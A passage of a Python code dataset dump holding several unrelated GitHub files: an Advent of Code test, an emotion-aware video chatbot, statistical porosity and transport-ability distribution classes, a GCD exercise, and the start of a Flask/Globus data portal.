ore. Each obsidian robot costs 2 ore and 11 clay. Each geode robot costs 4 ore and 8 obsidian.\n\"\"\"\n\n def test_part_1(self):\n self.assertEqual(33, day.solve1(self.data))\n\n @pytest.mark.slow\n def test_part_test_euristic(self):\n self.assertEqual(11, day.Blueprint(day.load(self.data_2)[0]).best(24))\n self.assertEqual(7, day.Blueprint(day.load(self.data_2)[1]).best(24))\n self.assertEqual(5, day.Blueprint(day.load(self.data_2)[2]).best(24))\n self.assertEqual(3, day.Blueprint(day.load(self.data_2)[3]).best(24))\n\n @pytest.mark.slow\n def test_part_2(self):\n # 56 * 62 = 3472\n self.assertEqual(56, day.Blueprint(day.load(self.data)[0]).best(32))\n self.assertEqual(62, day.Blueprint(day.load(self.data)[1]).best(32))\n\n @pytest.mark.slow\n def test_solution_part_1(self):\n self.assertEqual(1150, day.solve1(self.real_data))\n\n @pytest.mark.slow\n def test_solution_part_2(self):\n self.assertEqual(37367, day.solve2(self.real_data))\n","repo_name":"taifu/aoc","sub_path":"2022/19/test_19.py","file_name":"test_19.py","file_ext":"py","file_size_in_byte":2166,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"92"} +{"seq_id":"36735392891","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# audio to text\nimport speech_recognition as sr\nimport pyttsx3\n\n# text to emotion\nfrom text2emotion import get_emotion\n\n# Chatbot\nfrom chatterbot import ChatBot\nfrom chatterbot.trainers import ListTrainer\nfrom chatterbot.trainers import ChatterBotCorpusTrainer\n\n# display reply\nimport threading\n# import pyglet\n\n# user emotion\nfrom fer import FER\nimport matplotlib.pyplot as plt\nimport cv2\nimport os\n\n# display gif\nimport imageio\n\n# hide logging info\nimport logging\nlogger = logging.getLogger()\nlogger.setLevel(logging.DEBUG)\n\n\n# simple video-chat-bot\nclass VCBot():\n def __init__(self):\n # flag - false if vcbot is diplaying reply (speaking something)\n global flag\n flag = True\n self.r = sr.Recognizer()\n\n # Chatbot\n self.chatbot = ChatBot(\n 'Charlie'\n )\n\n self.trainer = ChatterBotCorpusTrainer(self.chatbot)\n\n self.trainer.train(\n *self.get_samples()\n )\n # speak\n self.engine = pyttsx3.init()\n self.engine.setProperty('rate', 145)\n logger.info(\"VCbot initialized\")\n\n def get_samples(self):\n __dir__ = os.path.dirname(os.path.realpath('__dir__'))\n sample_dir = os.path.join(__dir__, 'resources', 'samples')\n sample_list = [os.path.join(sample_dir, file)\n for file in os.listdir(sample_dir)]\n return sample_list\n\n def getUserEmotion(self):\n # detector for facial emotion\n detector = FER(mtcnn=True)\n cap = cv2.VideoCapture(0)\n ret, frame = cap.read()\n cv2.imwrite('temp.jpeg', frame)\n img = plt.imread('temp.jpeg')\n res = detector.detect_emotions(img)\n os.remove('temp.jpeg')\n if len(res) == 0:\n logger.info(\"No face detected\")\n return 'neutral'\n res_emotion = res[0]['emotions']\n return max(res_emotion, key=res_emotion.get)\n\n def audioToText(self):\n # convert user audio to text (language = english)\n try:\n # use the microphone as source for input.\n with sr.Microphone() as source2:\n\n # wait for a second to let the recognizer\n # adjust the energy threshold based on\n # the surrounding noise level\n self.r.adjust_for_ambient_noise(source2, duration=0.2)\n\n # listens for the user's input\n audio2 = self.r.listen(source2)\n\n # Using ggogle to recognize audio\n MyText = self.r.recognize_google(audio2)\n MyText = MyText.lower()\n\n return MyText\n\n except sr.RequestError as e:\n print(\"Could not request results; {0}\".format(e))\n logger.warning(\n \"Aud2text: Could not request results; {0}\".format(e))\n return 'error'\n\n except sr.UnknownValueError:\n print(\"unknown error occured\")\n logger.warning(\"Aud2text: unknown error occured\")\n return 'error'\n\n def getTextEmotion(self, t):\n # derive emotion from any text input\n res = get_emotion(t)\n emotion = max(res, key=res.get)\n if res[emotion] == 0:\n return 'neutral'\n return emotion.lower()\n\n def getChatReply(self, q):\n # chatterbot reply for given text input\n return str(self.chatbot.get_response(q))\n\n def vid(self, lock):\n # use gif for displaying reply to user\n gif = imageio.mimread('./resources/boy-talk.gif')\n nums = len(gif)\n imgs = [cv2.cvtColor(img, cv2.COLOR_RGB2BGR) for img in gif]\n i = 0\n global flag\n while True:\n lock.acquire()\n if flag:\n # no movement if not speaking\n cv2.imshow(\"gif\", imgs[0])\n else:\n # gif enabled for speaking\n cv2.imshow(\"gif\", imgs[i])\n lock.release()\n pressed = cv2.waitKey(25) & 0xFF\n if pressed == ord('q'):\n # quit\n logger.info(\"user requested to quit!\")\n break\n if pressed == ord('r'):\n # just to check if gif is used in dynamic sense (check by pressing 'r')\n lock.acquire()\n flag = not flag\n lock.release()\n i = (i+1) % nums\n cv2.destroyAllWindows()\n\n def SpeakText(self, command):\n # Initialize the engine to speak\n self.engine.say(command)\n self.engine.runAndWait()\n\n def ensemble(self, lock):\n # combined together: video-emotion, audio-to-text, text-emotion, emotion validation, chat-reply, speak-reply\n txt = ''\n while txt != 'exit':\n video_emotion = self.getUserEmotion()\n # print(video_emotion)\n logger.info(\"Video Emotion: \" + video_emotion)\n self.SpeakText('Your Turn')\n txt = self.audioToText()\n # print('aud2txt: ', txt)\n logger.info(\"Audio To Text: \" + txt)\n txt_emotion = self.getTextEmotion(txt)\n # print('textEmotion: ', txt_emotion)\n logger.info(\"Text Emotion: \" + txt_emotion)\n txt_inference = ''\n if txt_emotion != video_emotion and video_emotion != 'neutral':\n txt_inference = 'I am '+video_emotion\n logger.info(\"Added Text: \" + txt_inference)\n cbot_reply = self.getChatReply(txt+txt_inference)\n # print('cbot: ', cbot_reply)\n logger.info(\"Chatbot Reply: \" + cbot_reply)\n lock.acquire()\n global flag\n flag = False\n lock.release()\n self.SpeakText(cbot_reply)\n logger.info(\"Speaking something\")\n lock.acquire()\n flag = True\n lock.release()\n\n def run(self):\n # thread lock for critical section\n lock = threading.Lock()\n\n # creating thread\n # thread 1: display gif\n t1 = threading.Thread(target=self.vid, args=(lock,))\n # thread2: ensemble\n t2 = threading.Thread(target=self.ensemble, args=(lock,))\n\n # starting thread 1\n t1.start()\n # starting thread 2\n t2.start()\n\n # wait until thread 1 is completely executed\n t1.join()\n # wait until thread 2 is completely executed\n t2.join()\n\n # both threads completely executed\n print(\"Done!\")\n logger.info(\"Successfully completed execution, terminating vcbot!\")\n return\n\n\n# VCBot().run()\n","repo_name":"avaish1409/VideoChatBot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6587,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"92"} +{"seq_id":"6236065293","text":"#!/usr/bin/env python3\n\nimport numpy as np\nimport os.path\nimport scipy.stats as ss\n\n###############################################################################\n###############################################################################\n###############################################################################\n\nclass Porosity_Distribution():\n \n \"\"\"\n Class defining porosity properties and statistics of a chosen material type\n at a specified resolution\n - mean and std of porosity measurements --> Gaussian pdf\n - probility function for connectivity given porosity value \n \"\"\"\n\n def __init__(self, \n pmean=0.3, \n pstd=0.15,\n pmin = 0,\n pmax = 1,\n **kwargs):\n\n self.pmean = pmean\n self.pstd = pstd\n self.pmin = pmin\n self.pmax = pmax\n\n self.check()\n \n def check(self):\n \n if self.pmean <= 0 or self.pmean>=1:\n raise ValueError(\n \"mean porosities smaller 0 or larger 1 are not allowed\"\n )\n if self.pmin < 0 or self.pmin > 1:\n raise ValueError(\n \"Lower and/or upper margin values in range which is not allowed\"\n )\n\n ###Convert min and max for normal distribution to min and max for standard normal distribution\n self._a = ( self.pmin - self.pmean) / self.pstd\n self._b = ( self.pmax - self.pmean) / self.pstd\n\n def update_stats(self,\n pmean=False,\n pstd=False\n ):\n if pmean:\n self.pmean = pmean\n if pstd:\n self.pstd = pstd\n self.check()\n\n def pdf_porosity(self, \n x\n ):\n \"\"\"pdf for truncated normal distribution of porosity values \"\"\"\n\n return ss.truncnorm.pdf(x , self._a, self._b,loc=self.pmean,scale = self.pstd)\n\n def rvs_porosity(self, \n size = 1\n ):\n \"\"\"random value samples from truncated normal distribution of porosity values \"\"\"\n\n return ss.truncnorm.rvs(self._a, self._b,loc=self.pmean,scale = self.pstd, size=size)\n\n def pdf_stats(self,\n x = False,\n ):\n\n if x is False: \n term0 = (ss.norm.pdf(self._b) - ss.norm.pdf(self._a))/(ss.norm.cdf(self._b) - ss.norm.cdf(self._a))\n term1 = (self._b*ss.norm.pdf(self._b) - self._a*ss.norm.pdf(self._a))/(ss.norm.cdf(self._b) - ss.norm.cdf(self._a)) \n\n pmean_trunc = self.pmean - self.pstd * term0 \n pvar_trunc = self.pstd**2 * (1 - term1 - term0**2)\n \n elif x is not False:\n pdf = self.pdf_porosity(x)\n pmean_trunc = np.trapz(x*pdf,x=x)\n pvar_trunc = np.trapz((x-pmean_trunc)**2*pdf,x=x)\n\n self.pmean_trunc = pmean_trunc\n self.pstd_trunc = np.sqrt(pvar_trunc)\n\n return self.pmean_trunc, self.pstd_trunc\n\n\n def connectivity_func(self,\n x,\n por_con_min=0.07,\n por_con_max=0.39,\n fit_con=[27.362,-27.661,9.4256,-0.0927],\n **kwargs):\n\n \"\"\"percolation function: \n for every value of porosity it gives the (bernoulli-distributed) value \n of percolation probability\n \"\"\"\n ### calculate percolation function, polynomial coefficients from regression analysis\n pp_range=np.polyval(fit_con,x)\n \n ### add threshold values\n pp1=np.where(x>=por_con_min,pp_range,0)\n pp2=np.where(x<=por_con_max,pp1,1)\n \n return pp2\n\n def pdf_porosity_connected(self,\n x,\n normalize=False,\n **kwargs,\n ):\n\n \"\"\"Calculation of distribution of percolating porosity\n \"\"\"\n \n ### distribution of percolating porosities (not normalized)\n self.pdf_por_con=self.pdf_porosity(x)*self.connectivity_func(x,**kwargs) \n ### norm value of pdf of porosity values, should be 1\n self.connectivity_total=np.trapz(self.pdf_por_con,x=x) \n \n if normalize:\n self.pdf_por_con=self.pdf_por_con/self.connectivity_total\n\n return self.pdf_por_con\n\n\n def pdf_porosity_disconnected(self,\n x,\n normalize=False,\n **kwargs,\n ):\n\n \"\"\"Calculation of distribution of percolating porosity\n \"\"\"\n \n self.pdf_por_discon =self.pdf_porosity(x)*(1-self.connectivity_func(x,**kwargs))\n self.discon_total=np.trapz(self.pdf_por_discon,x=x) \n\n if normalize:\n self.pdf_por_discon=self.pdf_por_discon/self.discon_total\n\n return self.pdf_por_discon\n\n\n \n###############################################################################\n###############################################################################\n###############################################################################\n\nclass TA_POR_Distribution():\n\n \"\"\"\n Class for analysing connected transport ability data distributed over\n a range of porosity values\n \"\"\" \n\n def __init__(self, \n dp = 0.02,\n **kwargs):\n \n self.dp = float(dp)\n \n self.ta = None\n self.ta_con = None\n self.por = None\n self.por_con = None\n\n self.stats = None\n self.por_compress = None\n\n self.check()\n self.porosity_range()\n\n def check(self):\n if self.dp <= 0 or self.dp >=1:\n raise ValueError(\n \"Value of porosity step size must be between 0 and 1\"\n )\n elif self.dp >=0.1:\n print(\"Warning: Value of porosity step size very coarse\")\n\n def porosity_range(self):\n\n \"\"\" Set range of porosity values \"\"\"\n self.por_range=np.arange(0.5*self.dp,1.+0.5*self.dp,self.dp)\n\n return self.por_range\n\n def read_data(self,\n file_data='..data/por_ta_data.csv', ### observed transport abilities vs. porosity\n compress2con = False,\n por_con_min = 0.07,\n **kwargs,\n ):\n\n self.por_con_min = por_con_min\n\n \"\"\" read in ta-data as function of porosity \"\"\"\n\n if not os.path.isfile(file_data):\n raise ValueError(\"File for ta-data not accessible: \\n\",file_data)\n \n ta_data=np.loadtxt(file_data,delimiter=',')\n\n if compress2con:\n \"\"\" compress to data above the connectivity level for porosity \"\"\"\n por_condition = ta_data[:,0]>=self.por_con_min \n ta_data = np.compress(por_condition,ta_data,axis=0)\n\n ta_con_data = np.compress(ta_data[:,1]>0,ta_data,axis=0)\n \n self.por_con = np.array(ta_con_data[:,0],ndmin=1)\n self.ta_con = np.array(ta_con_data[:,1],ndmin=1) \n\n self.por = np.array(ta_data[:,0],ndmin=1)\n self.ta = np.array(ta_data[:,1],ndmin=1)\n\n return self.por,self.ta\n\n def set_data(self,\n ta,\n por,\n compress2con = False,\n por_con_min = 0.07,\n **kwargs,\n ):\n \n self.ta = ta\n self.por = por\n self.por_con_min = por_con_min\n \n \"\"\" compress to data above the connectivity level for porosity \"\"\"\n \n if compress2con:\n \"\"\" compress to data above the connectivity level for porosity \"\"\"\n por_condition = (self.por>=self.por_con_min) \n self.por = np.compress(por_condition,self.por,axis=0)\n self.ta = np.compress(por_condition,self.ta,axis=0)\n\n self.ta_con = np.compress(self.ta>0,self.ta,axis=0)\n self.por_con = np.compress(self.ta>0,self.por,axis=0)\n\n return self.por,self.ta\n\n def porosity_bin_data(self,\n round_decimals=2,\n ):\n\n \"\"\"\" resort ta-data into specified porosity bins \"\"\" \n if self.por_con is None:\n raise ValueError(\"read or set data first\")\n\n self.por_bin_data=dict()\n self.por_bin_logdata=dict()\n \n for ip,pi in enumerate(self.por_range): \n ### determine arguments in list of porosity values being in the range of interest\n data=np.compress((pi-0.5*self.dp<self.por_con)*(self.por_con<=pi+0.5*self.dp),self.ta_con)\n self.por_bin_data[pi]=data\n self.por_bin_logdata[pi]=np.log(data)\n\n return self.por_bin_data\n\n def statistics(self,\n nmin = 20, \n compress = True,\n **kwargs,\n ):\n\n \"\"\"\n Determine statistcs on TA distribution for each porosity bin\n\n Output\n ------ \n stats : array containing statistics on perm-distribution for every por-bin of size dpor\n --> stat values specified in header\n \"\"\"\n self.nmin = nmin\n \n if self.ta_con is None:\n raise ValueError(\"read or set data first\")\n\n self.porosity_range() \n self.stats=dict()\n self.stats['porosity']=self.por_range\n self.stats['number_in_bin'] = np.zeros(len(self.por_range))\n self.stats['mean'] = np.zeros(len(self.por_range))\n self.stats['std'] = np.zeros(len(self.por_range))\n self.stats['skewness'] = np.zeros(len(self.por_range))\n self.stats['log-mean'] = np.zeros(len(self.por_range))\n self.stats['log-std'] = np.zeros(len(self.por_range))\n\n self.porosity_bin_data()\n \n for ip,pi in enumerate(self.por_range):\n \n ### determine arguments in list of porosity values being in the range of interest\n\n data=self.por_bin_data[pi]\n log_data=np.log(data) \n self.stats['number_in_bin'][ip]=len(data)\n \n if len(data)>=self.nmin:\n self.stats['mean'][ip]=np.mean(data) ### mean of values \n self.stats['std'][ip]=np.std(data) ### standard deviation of values \n self.stats['skewness'][ip]=ss.skew(data) ### skewness of values \n self.stats['log-mean'][ip]=np.mean(log_data) ### mean of log-scaled values \n self.stats['log-std'][ip]=np.abs(np.std(log_data)) ### standard deviation of log-scaled values \n\n if compress:\n self.stats_compress()\n\n self.stats_values = np.array(list(self.stats.values())).T\n\n return self.stats_values,\" , \".join(list(self.stats.keys()))\n\n def stats_compress(self,\n **kwargs,\n ):\n\n \"\"\"\" compress TA(por) data and statistics to bins of sufficient data \"\"\"\n \n if self.stats is None:\n raise ValueError(\"read data and run statistical analysis first\")\n\n compress_condition=(self.stats['number_in_bin']>self.nmin)*(self.por_range>self.por_con_min)\n # print(compress_condition.shape)\n # print(self.stats['mean'].shape)\n \n self.por_compress = np.compress(compress_condition,self.por_range,axis=0)\n\n self.stats['mean']= np.compress(compress_condition,self.stats['mean'],axis=0)\n self.stats['std']= np.compress(compress_condition,self.stats['std'],axis=0)\n self.stats['skewness']= np.compress(compress_condition,self.stats['skewness'],axis=0)\n self.stats['log-mean']= np.compress(compress_condition,self.stats['log-mean'],axis=0)\n self.stats['log-std']= np.compress(compress_condition,self.stats['log-std'],axis=0)\n\n return compress_condition\n\n def write_stats(self,\n file_stats='stats_ta.csv',\n delimiter = ',',\n fmt = '%.3f',\n ):\n\n \"\"\" Write statistical results to file \"\"\" \n np.savetxt(file_stats,self.stats_values,header = \" {}\".format(delimiter).join(list(self.stats.keys())),fmt = fmt,delimiter=delimiter)\n\n def read_stats(self,\n file_stats='stats_ta.csv',\n delimiter = ',',\n ):\n\n \"\"\" Read statistical results from file \"\"\" \n \n self.stats_values = np.loadtxt(file_stats,delimiter=delimiter,skiprow=1)\n \n def normality_tests(self,\n alpha=0.05,\n lognorm=False,\n delimiter = ',',\n **kwargs,\n ):\n\n \"\"\"\n Test TA-data in each porosity bin on normality and log-normality\n \n \n Optional\n --------\n alpha : p-value level to evaluate as matching normal distribution\n lognormal : transformation of data to log-normal (check on log-normality)\n nmin : minimal number of samples in bin to be statistically analysed\n \n Output\n ------ \n normality : array containing statistics on perm-distribution for every por-bin of size dpor\n --> stat values specified in header\n \"\"\"\n\n # if self.stats is None:\n self.statistics(compress = False,**kwargs)\n\n stats_normal=dict()\n stats_normal['porosity']=self.por_range\n \n if lognorm:\n test_data='log_'\n else:\n test_data=''\n\n tests=['{}shapiro_{:.0f}'.format(test_data,100*alpha),'{}dagostino_{:.0f}'.format(test_data,100*alpha),'{}anderson_15'.format(test_data),'{}anderson_5'.format(test_data),'{}anderson_1'.format(test_data)]\n for test in tests:\n stats_normal[test]=np.zeros(len(self.por_range))\n \n for ip,pi in enumerate(self.por_range):\n data=self.por_bin_data[pi]\n# data=np.compress((pi-0.5*self.dp<self.por_con)*(self.por_con<=pi+0.5*self.dp),self.ta_con)\n if lognorm:\n data=np.log(data)\n \n if len(data)>=self.nmin:\n \n ### Normality testing according to shapiro\n stat_shapiro_nr,p_shapiro_nr=ss.shapiro(data) \n #print('Shapiro-Statistics: %.3f, p=%.3f' %(stat_shapiro_nr,p_shapiro_nr)) \n\n #self.stats['p_shapiro'][ip]=p_shapiro_nr\n if p_shapiro_nr>alpha:\n stats_normal[tests[0]][ip]=1\n \n stat_dagostino_nr,p_dagostino_nr=ss.normaltest(data) \n #print('Dagostino-Statistics: %.3f, p=%.3f' %(stat_dagostino_nr,p_dagostino_nr))\n #self.stats['p_dagostino'][ip]=p_dagostino_nr\n if p_dagostino_nr>alpha:\n stats_normal[tests[1]][ip]=1\n \n stat_AD=ss.anderson(data)\n #print('Anderson-Darling Test, statistics={:.3f}'.format(stat_AD.statistic))\n \n if stat_AD.statistic < stat_AD.critical_values[0]:\n #print('sign. level={:.0f}%, critical value={:.3f}: data not normal'.format(sl, cv))\n stats_normal[tests[2]][ip]=1\n #else:\n #print('sign. level={:.0f}%,critical value={:.3f}: data looks normal '.format(sl, cv))\n if stat_AD.statistic < stat_AD.critical_values[2]:\n stats_normal[tests[3]][ip]=1\n if stat_AD.statistic < stat_AD.critical_values[4]:\n stats_normal[tests[4]][ip]=1\n\n else:\n for test in tests:\n stats_normal[test][ip]=2\n\n self.stats.update(stats_normal)\n self.stats_values = np.array(list(self.stats.values())).T\n\n return stats_normal\n # return np.array(list(stats_normal.values())).T,'porosity {} {}'.format(delimiter, \" {} \".format(delimiter).join(tests))\n\n def fit_stats2por(self,\n fitting='ta_fit_poly',\n por_min=0,\n **kwargs,\n ):\n\n \"\"\"\n fit log-TA statistics (log-mean, log-std) to polynomial function of por\n \"\"\"\n \n # if self.stats is None:\n self.statistics(compress = False,**kwargs)\n \n if fitting == 'ta_fit_poly':\n self.ta_fit=dict(\n mean_deg = 2,\n std_deg = 3, \n )\n elif fitting == 'ta_fit_adapt':\n self.ta_fit=dict(\n mean_deg = 1,\n std_deg = 3, \n ) \n else:\n self.ta_fit=fitting\n\n ### Reduce to data which is has sufficient data points (len(data)>nmin) and is above percolation threshold (por>por_min)\n compress_condition=(self.stats['number_in_bin']>self.nmin)*(self.por_range>por_min)\n \n por_cond = np.compress(compress_condition,self.por_range,axis=0)\n mean_cond = np.compress(compress_condition,self.stats['log-mean'],axis=0)\n std_cond = np.compress(compress_condition,self.stats['log-std'],axis=0)\n \n \"\"\" fit of mean according to specified fitting function \"\"\"\n if fitting == 'ta_fit_poly': \n ### Polynomial fitting according to choice of degree of polynomial\n fp1=np.polyfit(por_cond, mean_cond,deg=self.ta_fit['mean_deg'])\n mean_fit=np.polyval(fp1,self.por_range)\n mean_fit [mean_fit>0] = 0\n self.ta_fit['mean_coeff'] = fp1\n self.ta_fit['mean_fit'] = mean_fit # mean values of ta for por_range given fitting function\n\n self.ta_fit['por_min'] = np.compress(compress_condition,self.por_range)[0] # minimum porosity where fit is valid\n self.ta_fit['por_max'] = np.compress(compress_condition,self.por_range)[-1] # maximum porosity where fit is valid\n\n elif fitting =='ta_fit_adapt': \n ### Polynomial fitting according to choice of degree of polynomial\n mean_adapt = np.where(por_cond >0,mean_cond/(1 - por_cond),0)\n fp1=np.polyfit(por_cond,mean_adapt ,deg=self.ta_fit['mean_deg'])\n mean_fit=(1-self.por_range)*np.polyval(fp1,self.por_range)\n\n self.ta_fit['mean_coeff'] = fp1\n self.ta_fit['mean_fit'] = mean_fit # mean values of ta for por_range given fitting function\n\n else:\n print('Fitting type not specified')\n\n \"\"\" fitting of variance \"\"\"\n fp2=np.polyfit(por_cond,std_cond,deg=self.ta_fit['std_deg'])\n std_fit=np.polyval(fp2,self.por_range) \n std_fit = np.where(compress_condition,std_fit,0)\n std_fit [std_fit<0] = 0\n self.ta_fit['std_coeff'] = fp2\n self.ta_fit['std_fit'] = std_fit # std values of ta for por_range given fitting function\n\n\n def interpolate_ta_log_mean(self,\n px=False,\n **kwargs,\n ):\n\n \"\"\" mu_TA(por): \n create function of log-mean for TA values as function of porosity values, either\n - specified range px (e.g. at finer resolution)\n - using the compressed porosity values (px = False) \n \"\"\"\n \n # if self.stats is None:\n self.statistics(compress=True,**kwargs)\n\n if px is False:\n px = self.por_compress\n\n mean_adapt = self.stats['log-mean']/(1 - self.por_compress)\n fp1=np.polyfit(self.por_compress,mean_adapt ,deg=1)\n\n self.ta_log_mean_por=(1-px)*np.polyval(fp1,px)\n\n return self.ta_log_mean_por\n\n def interpolate_ta_log_std(self,\n px=False,\n **kwargs,\n ):\n\n \"\"\" sigma_TA(por): \n create function of log-std for TA values as function of porosity values, either\n - specified range px (e.g. at finer resolution)\n - using the compressed porosity values (px = False) \n \"\"\"\n\n \"\"\" fitting of variance \"\"\"\n # if self.stats is None:\n self.statistics(compress=True,**kwargs)\n\n if px is False:\n px = self.por_compress\n\n fp2=np.polyfit(self.por_compress,self.stats['log-std'],deg=3)\n std_fit=np.hstack([[0],np.polyval(fp2,self.por_compress),[0]])\n por_fit = np.hstack([[0],self.por_compress,[1]])\n\n self.ta_log_std_por=np.interp(px,por_fit,std_fit)\n\n return self.ta_log_std_por\n\n def rvs_ta(self, \n sample_data = False, \n nrand = 1600 , \n **kwargs,\n ):\n\n \"\"\"\n random sampling of ta values from\n - log-normal distribution (sample_data = False) using mean and var determined from log-data\n - directly from data by using the log-data as sample distribution\n \n random values are samples in log-transformed space (exponent) and transformed into data space \n \"\"\"\n\n\n self.interpolate_ta_log_mean(px = self.por_range,**kwargs)\n self.interpolate_ta_log_std(px = self.por_range,**kwargs)\n compress_condition=(self.stats['number_in_bin']>self.nmin)*(self.por_range>self.por_con_min)\n \n ta_rand_values = np.ones([len(self.por_range),nrand])\n for ip,pi in enumerate(self.por_range): \n if compress_condition[ip]: \n\n if sample_data:\n hist = np.histogram(self.por_bin_logdata[pi], bins=self.nmin) \n hist_dist = ss.rv_histogram(hist) \n ta_rand_values[ip,:] = hist_dist.rvs(size = [nrand])\n \n else:\n ta_rand_values[ip,:] = ss.norm.rvs(loc = self.ta_log_mean_por[ip],scale = self.ta_log_std_por[ip],size =[nrand])\n \n else:\n ### porosity values with not sufficient data\n ta_rand_values[ip,:] = self.ta_log_mean_por[ip]\n \n return np.exp(ta_rand_values)\n\n def pdf_ta_con(self,\n tay,\n px = False,\n **kwargs,\n ):\n \n \"\"\" generate log-normal pdf of TA-values (in resolution tay) for each porosity value \n compressed data range \n \"\"\"\n\n self.interpolate_ta_log_mean(px=px,**kwargs)\n self.interpolate_ta_log_std(px=px,**kwargs)\n \n if px is False:\n px = self.por_compress\n \n pdf = np.zeros((len(px),len(tay)))\n\n for ip in range(len(px)): \n if px[ip] == 0:\n pdf[ip,:] = 0\n else:\n pdf[ip,:]=ss.lognorm.pdf(tay,s=self.ta_log_std_por[ip],scale=np.exp(self.ta_log_mean_por[ip]))\n \n self.pdf_ta_con = pdf\n return self.pdf_ta_con\n\n def connectivity_distribution(self,\n compress = True,\n ):\n\n \"\"\" por-resolution level (from data):\n analysis of connectivity of TA-values distributed for porosity values\n --> percolation function of particular ensemble\n \"\"\"\n \n pcon = 2*np.ones(len(self.por_range))\n for ip,pi in enumerate(self.por_range): \n ### determine arguments in list of porosity values being in the range of interest\n data=np.compress((pi-0.5*self.dp<self.por)*(self.por<=pi+0.5*self.dp),self.ta)\n if len(data)>0:\n pcon[ip] = np.mean(data>0) \n\n if compress:\n \"\"\" compress to data above the connectivity level for porosity \"\"\"\n condition = pcon<2\n self.pcon_data = np.compress(condition,pcon)\n px = np.compress(condition,self.por_range)\n else:\n self.pcon_data = pcon\n px = self.por_range\n \n return self.pcon_data, px\n\n \n###############################################################################\n###############################################################################\n###############################################################################\n\nclass TA_Distribution():\n\n def __init__(self, \n dim = 2,\n ta_gmean = 0.022, \n ta_log_std = 2, \n ta_pcon = 1,\n **settings):\n\n self.dim = dim\n self.ta_gmean = ta_gmean\n self.ta_log_std = ta_log_std \n self.ta_pcon = ta_pcon\n \n def pdf_ta_con(self,tay):\n\n \"\"\" ensemble level (theory):\n log-normal pdf of TA-values based on scale-dependent mean and std \n of log-ta data from upscaling theory\n (marginal distribution of ta-por-scatter) \n \"\"\"\n\n self.pdf_ta_con= ss.lognorm.pdf(tay, s = self.ta_log_std, scale = self.ta_gmean)\n\n return self.pdf_ta_con\n\n def pdf_ta(self,tay):\n\n \"\"\" ensemble level (theory):\n log-normal pdf of TA-values based on scale-dependent mean and std \n of log-ta data from upscaling theory\n (marginal distribution of ta-por-scatter) \n \"\"\"\n self.pdf_ta_con(tay)\n\n self.pdf_ta = self.pdf_ta_con*self.ta_pcon\n self.pdf_ta[0] = 1-self.ta_pcon \n \n return self.pdf_ta\n\n def moments_ta(self):\n \n ### expectation value for adapted probability distrubtion including non-connected values\n self.ta_1moment = self.ta_pcon*self.ta_gmean*np.exp(0.5*self.ta_log_std**2)\n ### variance value for adapted probability distrubtion including non-connected values\n self.ta_2moment = self.ta_pcon*self.ta_gmean**2*np.exp(self.ta_log_std**2)*(np.exp(self.ta_log_std**2)-self.ta_pcon)\n\n return self.ta_1moment,self.ta_2moment\n\n","repo_name":"AlrauneZ/TransportAbility","sub_path":"src/Distributions.py","file_name":"Distributions.py","file_ext":"py","file_size_in_byte":26208,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"92"} +{"seq_id":"7336947964","text":"'''\n(Compute GCD) Write a function that returns the greatest common divisor\n(GCD) of integers in a list. Use the following function header:\ndef gcd(numbers):\nWrite a test program that prompts the user to enter five numbers, invokes the\nfunction to find the GCD of these numbers, and displays the GCD.\n'''\n\ndef gcd(numbers):\n answer = numbers[0]\n for m in numbers[1:]:\n x = answer\n y = m\n while y >0:\n x, y =y, x%y\n\n answer = x\n\n return answer\n\n\ndef main():\n numbers = []\n print(\"Enter 5 numbers and press enter after entering each number to find GCD:\")\n for i in range(0, 5):\n elem = int(input())\n numbers.append(elem)\n\n\n answer = gcd(numbers)\n print(\"The GCD is: \", answer)\n\n\nmain()\n","repo_name":"abccba123/my_projects","sub_path":"Chp10_12.py","file_name":"Chp10_12.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"23416317878","text":"import requests\nfrom flask import (abort, flash, redirect, render_template, request, session,\n url_for)\nfrom globus_sdk import (RefreshTokenAuthorizer, TransferAPIError,\n TransferClient, TransferData)\n\nfrom portal import app, database, datasets\nfrom portal.decorators import authenticated\nfrom portal.utils import (get_portal_tokens, get_safe_redirect,\n load_portal_client)\n\ntry:\n from urllib.parse import urlencode\nexcept ImportError:\n from urllib import urlencode\n\n\n@app.route('/', methods=['GET'])\ndef home():\n if 'source_endpoint' not in session:\n session['source_endpoint'] = 1\n return render_template('home.jinja2')\n\n\n@app.route('/doc/<doc_name>')\ndef render_doc(doc_name):\n return render_template('doc_template.jinja2', doc_name=doc_name)\n\n@app.route('/signup', methods=['GET'])\ndef signup():\n \"\"\"Send the user to Globus Auth with signup=1.\"\"\"\n return redirect(url_for('authcallback', signup=1))\n\n\n@app.route('/login', methods=['GET'])\ndef login():\n \"\"\"Send the user to Globus Auth.\"\"\"\n return redirect(url_for('authcallback'))\n\n\n@app.route('/logout', methods=['GET'])\n@authenticated\ndef logout():\n \"\"\"\n - Revoke the tokens with Globus Auth.\n - Destroy the session state.\n - Redirect the user to the Globus Auth logout page.\n \"\"\"\n client = load_portal_client()\n\n # Revoke the tokens with Globus Auth\n for token, token_type in (\n (token_info[ty], ty)\n # get all of the token info dicts\n for token_info in session['tokens'].values()\n # cross product with the set of token types\n for ty in ('access_token', 'refresh_token')\n # only where the relevant token is actually present\n if token_info[ty] is not None):\n client.oauth2_revoke_token(\n token, additional_params={'token_type_hint': token_type})\n\n # Destroy the session state\n session.clear()\n\n redirect_uri = url_for('home', _external=True)\n\n ga_logout_url = []\n ga_logout_url.append(app.config['GLOBUS_AUTH_LOGOUT_URI'])\n ga_logout_url.append('?client={}'.format(app.config['PORTAL_CLIENT_ID']))\n ga_logout_url.append('&redirect_uri={}'.format(redirect_uri))\n ga_logout_url.append('&redirect_name=LSSTDESC Data Portal')\n\n # Redirect the user to the Globus Auth logout page\n return redirect(''.join(ga_logout_url))\n\n\n@app.route('/profile', methods=['GET', 'POST'])\n@authenticated\ndef profile():\n \"\"\"User profile information. Assocated with a Globus Auth identity.\"\"\"\n if request.method == 'GET':\n identity_id = session.get('primary_identity')\n profile = database.load_profile(identity_id)\n\n if profile:\n name, email, institution, source_endpoint = profile\n\n session['name'] = name\n session['email'] = email\n session['institution'] = institution\n session['source_endpoint'] = source_endpoint\n else:\n flash(\n 'Please complete any missing profile fields and press Save.')\n\n if 